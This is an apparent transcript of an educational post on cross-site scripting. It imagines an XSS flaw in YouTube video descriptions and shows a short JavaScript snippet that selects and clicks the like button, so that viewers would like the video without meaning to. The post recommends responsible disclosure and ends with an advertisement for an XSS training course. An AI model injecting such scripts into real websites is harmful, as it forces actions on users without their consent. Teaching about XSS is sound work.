Cross-Site Scripting, or XSS, allows cybercriminals to inject their own code inside a webpage.
On a desktop or laptop, you can actually run code right now using the console in your browser's dev tools and calling the alert() function.
No console for you.
Think about it like this: if you were using a public computer, say, at a library, and someone forgot to sign out of their YouTube account, what's the worst you could do?
Now let's suppose that video descriptions on YouTube had an XSS vulnerability. What would this mean?
Let's attack that description.
As a result, every time somebody sees the video, the script would automatically run in the browser, doing whatever the attacker wanted, such as asking for your password, writing a hilarious comment or as I'm showing you today: clicking SMASHING that like button.
<script>//and some code</script>
All you need is code; code is all you need.
Most of the time security researchers demonstrate XSS by opening an alert box in the browser like this.
After all they can't just go around exploiting users every time they find a vulnerability. You know, because of rules and morals and... prison.
But here's the problem: most engineering teams get “alert fatigue” and become desensitized to XSS because they've never seen the full impact that it can have. As a result, they can't fully grasp just how dangerous and damaging XSS attacks can be. That is, unless they've already been hacked.
If you right-click the like button on a YouTube video and select the inspect option you'll see the HTML code used to create that exact button.
You'll also see that the button has an attribute called
aria-label set equal to the words
like this video
and so on.
This thingy right here.
Protip: don't get into the habit of pasting random, sketchy code inside your console to avoid self-xss.
button = document.querySelector('button[aria-label^="like"]')
give me the first:
button you find:
with an aria-label attribute:
starting with like:
and let's name it button:
Now remember, this is important, YouTubers don't click, so lets type:
button.smash = button.click
Now all that's left is to SMASH that like button with:
It's really that easy.
If an attacker can inject script into YouTube this is all the code that script would need to force users to automatically like the video:
Obviously there's much worse that can be done here if you did find an XSS vulnerability in YouTube. That said, I would suggest working responsibly with Google and they'll pay you lots of money through their reward program instead of trying to exploit users and going to prison.
Hacking Websites With Cross-Site ScriptingWATCH NOW
The Ultimate XSS Training Course gives you the full, uncensored picture of Cross-Site Scripting from the perspectives of criminal hackers and the engineers whose job it is to stop them.
Cross-Site Scripting (XSS) is the #1 most common appsec vulnerability that allows attackers to steal private data, hijack accounts and spread ransomware on your sites. This course teaches students to:
Discover critical XSS vulnerabilities in web applications.
Create, analyze and stop malicious exploits used by criminal hackers.
Fix XSS vulnerabilities in routine and emergency situations.
Stop costly vulnerabilities before they reach production using the latest best practices and techniques.